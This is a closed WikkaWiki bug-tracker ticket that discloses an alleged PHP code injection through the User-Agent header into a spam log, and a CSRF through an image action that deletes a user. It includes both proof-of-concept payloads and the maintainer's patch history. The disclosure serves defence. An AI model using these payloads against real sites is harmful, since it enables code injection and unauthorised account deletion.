Ticket #1098 (closed defect: fixed)

Opened 3 years ago

Last modified 2 years ago

RCE and CSRF vulnerabilities

Reported by: EgiX Owned by: BrianKoontz
Priority: highest Milestone: 1.3.2-patches
Component: unspecified Version: 1.3.2-p1
Severity: normal Keywords:
Cc:

Description (last modified by BrianKoontz) (diff)

I've found two other vulnerabilities.

The first is a Remote Code Execution here:

 https://wush.net/trac/wikka/browser/trunk/libs/Wakka.class.php#L1315

If 'spam_logging' option is enabled, an attacker could be able to inject arbitrary PHP code into 'spamlog_path' file (that by default is './spamlog.txt.php') through 'HTTP_USER_AGENT' variable. Proof of concept:

POST /wikka/test/addcomment HTTP/1.1

Host: localhost

Cookie: 96522b217a86eca82f6d72ef88c4c7f4=6l11flsnvef642oajav0ufnp83

User-Agent: <?php phpinfo(); ?>

Content-Length: 27

Content-Type: application/x-www-form-urlencoded

Connection: keep-alive

body=foo&submit=Add+Comment

The second is a Cross-Site Request Forgery vulnerability, an attacker could be able to create a malicious page containing an {{image}} action like this:

{{image url=" http://localhost/wikka/AdminUsers?user=TestUser&action=delete"}}

When the admin will visit this page, the 'TestUser' account will be deleted.

Related tickets

#1097 Multiple Security Vulnerabilities

Change History

Changed 3 years ago by BrianKoontz

Thanks for the heads up, EgiX. I'll check these out and fix as appropriate.

Changed 2 years ago by BrianKoontz

(In [1819]) All admin actions have been converted from GET to POST requests. Ref #1098.

Changed 2 years ago by BrianKoontz

  • description modified (diff)

Changed 2 years ago by BrianKoontz

Because of the way the Wikka engine parses page requests, a user cannot view the spamlog as a PHP file. And when it's rendered in the AdminSpamLog page, it's simply displayed as a text file. Therefore, no RCE exists in as described in the first example.

Changed 2 years ago by BrianKoontz

  • owner changed from unassigned to BrianKoontz
  • status changed from new to assigned
  • version changed from 1.3 to 1.3.2
  • milestone set to 1.3.3

Changed 2 years ago by BrianKoontz

  • status changed from assigned to closed
  • resolution set to fixed

Changed 2 years ago by BrianKoontz

  • version changed from 1.3.2 to trunk
  • milestone changed from 1.3.3 to 1.4

Changed 2 years ago by BrianKoontz

(In [1823]) Backported security patches #1097 and #1098 from trunk to 1.3.2-p1. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

  • version changed from trunk to 1.3.2-p1
  • milestone changed from 1.4 to 1.3.2-patches

Changed 2 years ago by BrianKoontz

(In [1825]) Removed HTML markup from UserAgent and comment body before archiving in spamlog. Refs #1098.

Changed 2 years ago by BrianKoontz

(In [1826]) Backported to 1.3.2-p2. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1829]) Backported to 1.3.2-p3. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1830]) Backported to 1.3.2p3. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1834]) Backported to 1.3.2p4. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1838]) Backported to 1.3.2-p6. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1840]) Backported to 1.3.2-p7. Refs #1097, #1098, #1104.

Changed 2 years ago by BrianKoontz

(In [1842]) Implemented CSRF tokens in all POST forms. Refs #1098.

Note: See TracTickets for help on using tickets.